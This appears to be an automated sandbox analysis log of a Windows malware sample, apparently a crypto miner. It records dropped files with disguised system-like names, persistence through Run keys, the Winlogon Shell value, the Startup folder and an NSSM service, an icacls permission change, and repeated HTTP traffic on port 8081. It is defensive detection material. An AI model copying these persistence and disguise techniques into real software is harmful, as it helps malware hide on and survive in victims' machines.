Source: IYXE4Uz61k.exe  Static PE information: section name: .didat
Source: migrate.exe.0.dr  Static PE information: section name: .didat
Source: ApplicationsFrameHost.exe.26.dr  Static PE information: section name: _RANDOMX
Source: ApplicationsFrameHost.exe.26.dr  Static PE information: section name: _TEXT_CN
Source: ApplicationsFrameHost.exe.26.dr  Static PE information: section name: _TEXT_CN
Source: ApplicationsFrameHost.exe.26.dr  Static PE information: section name: _RDATA
Source: MSTask.exe.26.dr  Static PE information: section name: _RDATA
Source: Wrap.exe.26.dr  Static PE information: section name: _RDATA
Source: MicrosoftPrt.exe.26.dr  Static PE information: section name: _RDATA
Source: 1.exe.26.dr  Static PE information: section name: .didat
Source: MicrosoftPrt.exe.27.dr  Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.56.dr  Static PE information: section name: .00cfg
Source: libssl-1_1.dll.56.dr  Static PE information: section name: .00cfg
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088F640 push ecx; ret 0_2_0088F653
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088EB78 push eax; ret 0_2_0088EB96
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012F640 push ecx; ret 26_2_0012F653
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012EB78 push eax; ret 26_2_0012EB96
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_00000001400055DB push rcx; iretd 31_2_00000001400055DC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DD510C push rcx; retf 0000h56_2_00007FF7B1DD510D
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FF640 push ecx; ret 60_2_003FF653
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FEB78 push eax; ret 60_2_003FEB96
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9AFF540B push ss; ret 65_2_00007FFD9AFF5411
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A115D push ebp; iretd 65_2_00007FFD9B1A1160
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B247475 pushad ; ret 65_2_00007FFD9B247476
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B2474C3 push eax; ret 65_2_00007FFD9B2474C4
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B247507 push eax; ret 65_2_00007FFD9B247508
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B24752E pushad ; ret 65_2_00007FFD9B24752F
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B24753A push ebp; iretd 65_2_00007FFD9B247540
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E7C2F pushad ; retf 65_2_00007FFD9B6E7C5D
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E62D4 push FFFFFFE8h; ret 65_2_00007FFD9B6E68F9
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E7967 push ebx; retf 65_2_00007FFD9B6E796A
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E7C5F push eax; retf 65_2_00007FFD9B6E7C6D

Persistence and Installation Behavior

Source: C:\Windows\Tasks\IntelConfigService.exe  Executable created and started: C:\Windows\Tasks\Superfetch.exe
Source: C:\Windows\Tasks\IntelConfigService.exe  Executable created and started: C:\Windows\Tasks\Wrap.exe
Source: C:\Windows\System32\cmd.exe  Executable created and started: C:\Windows\Tasks\ApplicationsFrameHost.exe
Source: C:\Windows\Tasks\MSTask.exe  Executable created and started: C:\Windows\Tasks\MSTask.exe
Source: C:\Windows\SysWOW64\cmd.exe  Executable created and started: C:\Windows\Tasks\1.exe
Source: C:\Windows\Tasks\Wmiic.exe  Executable created and started: C:\Windows\Tasks\IntelConfigService.exe
Source: C:\Windows\SysWOW64\cmd.exe  Executable created and started: C:\Windows\Bridgeprovider.exe
Source: C:\Windows\SysWOW64\cmd.exe  Executable created and started: C:\Windows\Tasks\Wmiic.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\WinRing0x64.sys
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\MSTask.exe
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_ctypes.pyd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_socket.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\IZEltFrY.log
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\1.exe
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\brrRNKBn.log
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\Superfetch.exe
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\EjOumJqe.log
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\Wrap.exe
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\IIxTfkxV.log
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\sPPOvTaE.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\unicodedata.pyd
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\VCRUNTIME140.dll
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\IntelConfigService.exe
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\libcrypto-1_1.dll
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\python38.dll
Source: C:\Windows\Tasks\1.exe  File created: C:\Windows\Bridgeprovider.exe
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\python3.dll
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\UBnkPfhE.log
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Windows\INF\MicrosoftDefenger.exe
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\fZypqYbb.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\select.pyd
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\Wmiic.exe
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\bjHzibbh.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\OShKWlwM.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\libffi-7.dll
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\AtXEfMql.log
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe  File created: C:\ProgramData\migrate.exe
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_bz2.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\QLwtIihK.log
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\MicrosoftPrt.exe
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\Aepdvrho.log
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\HcddYGcd.log
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\quigFLkP.log
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\syIwhxhC.log
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\ApplicationsFrameHost.exe
Source: C:\Windows\SysWOW64\cmd.exe  File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_queue.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\hbkYLHfW.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_hashlib.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\UtDRkwHy.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\KbrUPpvT.log
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\DmmmRJbk.log
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\OIKLmzcP.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\libssl-1_1.dll
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\tvjECxvw.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_lzma.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\vrXfSuSA.log
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\_ssl.pyd
Source: C:\Windows\Tasks\MSTask.exe  File created: C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pyd
Source: C:\Windows\Bridgeprovider.exe  File created: C:\Users\user\Desktop\mFfXERcN.log

Boot Survival

Source: C:\Windows\Bridgeprovider.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger
Source: C:\Windows\Bridgeprovider.exe  Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Windows\SysWOW64\cmd.exe  File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe
Source: C:\Windows\SysWOW64\cmd.exe  File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftPrt.exe
Source: C:\ProgramData\migrate.exe  File created: C:\Windows\Tasks\__tmp_rar_sfx_access_check_4323765
Source: C:\Windows\Tasks\Wmiic.exe  Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\NSSM
Source: C:\Windows\Tasks\Wmiic.exe  Code function: 31_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError, 31_2_000000014000A2E0
Source: C:\Windows\Bridgeprovider.exe  Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49742
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49744
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49752
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 8081
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49773
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49795
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49820
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49842
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49863 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49863
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49888 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49888
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49909 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49909
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49930 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49930
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49951 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49951
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49972 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49972
                                  Source: unknown | Network traffic detected: HTTP traffic on port 49999 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 49999
                                  Source: unknown | Network traffic detected: HTTP traffic on port 50021 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 50021
                                  Source: unknown | Network traffic detected: HTTP traffic on port 50028 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 50028
                                  Source: unknown | Network traffic detected: HTTP traffic on port 50030 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 50030
                                  Source: unknown | Network traffic detected: HTTP traffic on port 50033 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 50033
                                  Source: unknown | Network traffic detected: HTTP traffic on port 50035 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 50035
                                  Source: unknown | Network traffic detected: HTTP traffic on port 50038 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 50038
                                  Source: unknown | Network traffic detected: HTTP traffic on port 50040 -> 8081
                                  Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 50040
                                  Source: C:\Windows\Tasks\Wrap.exe | Code function: 42_2_00007FF726CF61D4 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,42_2_00007FF726CF61D4
                                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                   Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
